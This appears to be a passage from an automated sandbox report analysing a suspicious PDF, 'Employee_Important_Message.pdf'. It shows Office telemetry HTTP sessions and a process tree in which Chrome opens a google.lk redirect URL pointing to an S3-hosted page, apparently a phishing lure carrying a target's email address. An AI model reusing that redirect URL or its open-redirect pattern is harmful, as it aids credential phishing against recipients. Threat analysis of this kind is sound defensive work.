                                                                        2024-12-03 16:51:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        147192.168.2.44990613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:23 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:23 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:23 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1407
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                        ETag: "0x8DC582BE687B46A"
                                                                        x-ms-request-id: 56289a14-001e-0028-02a9-42c49f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165123Z-174f78459685726chC1EWRsnbg000000168g00000000dhhx
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:23 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        148192.168.2.44990713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:23 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:24 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:23 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1370
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                        x-ms-request-id: 4c44aa58-201e-005d-7b91-3fafb3000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165123Z-174f7845968kdththC1EWRzvxn0000000kp0000000001mng
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:24 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        149192.168.2.44990813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:23 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:24 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:23 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1397
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                        ETag: "0x8DC582BE156D2EE"
                                                                        x-ms-request-id: 581112ab-301e-0000-7391-3feecc000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165123Z-174f7845968kvnqxhC1EWRmf3g0000000t0g00000000cgup
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:24 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:11:49:21
                                                                        Start date:03/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf"
                                                                        Imagebase:0x7ff6bc1b0000
                                                                        File size:5'641'176 bytes
                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:11:49:22
                                                                        Start date:03/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                        Imagebase:0x7ff74bb60000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:11:49:22
                                                                        Start date:03/12/2024
                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1640,i,14083476496902513719,8648232596601135647,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                        Imagebase:0x7ff74bb60000
                                                                        File size:3'581'912 bytes
                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:11:49:24
                                                                        Start date:03/12/2024
                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.lk/url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#c211cnBoeUBhbWVyaWNhbi11c2EuY29t
                                                                        Imagebase:0x7ff76e190000
                                                                        File size:3'242'272 bytes
                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:5
                                                                        Start time:11:49:26
                                                                        Start date:03/12/2024
                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2156,i,4777409756344785431,10372266608452722873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                        Imagebase:0x7ff76e190000
                                                                        File size:3'242'272 bytes
                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        No disassembly